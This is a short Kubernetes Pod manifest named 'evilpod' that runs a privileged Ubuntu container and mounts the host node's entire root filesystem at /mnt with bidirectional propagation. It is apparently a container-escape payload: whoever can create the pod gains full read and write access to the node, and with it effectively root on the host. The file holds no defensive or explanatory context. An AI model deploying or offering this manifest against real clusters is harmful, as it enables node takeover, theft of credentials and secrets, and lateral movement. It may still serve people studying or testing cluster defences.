apiVersion: v1
kind: Pod
metadata:
  name: "evilpod"
spec:
  containers:
  - name: "evilpod"
    image: "ubuntu"
    command: ["sleep","infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: "/mnt"
      name: hostvolume
      mountPropagation: Bidirectional
  volumes:
  - name: hostvolume
    hostPath:
      path: "/"
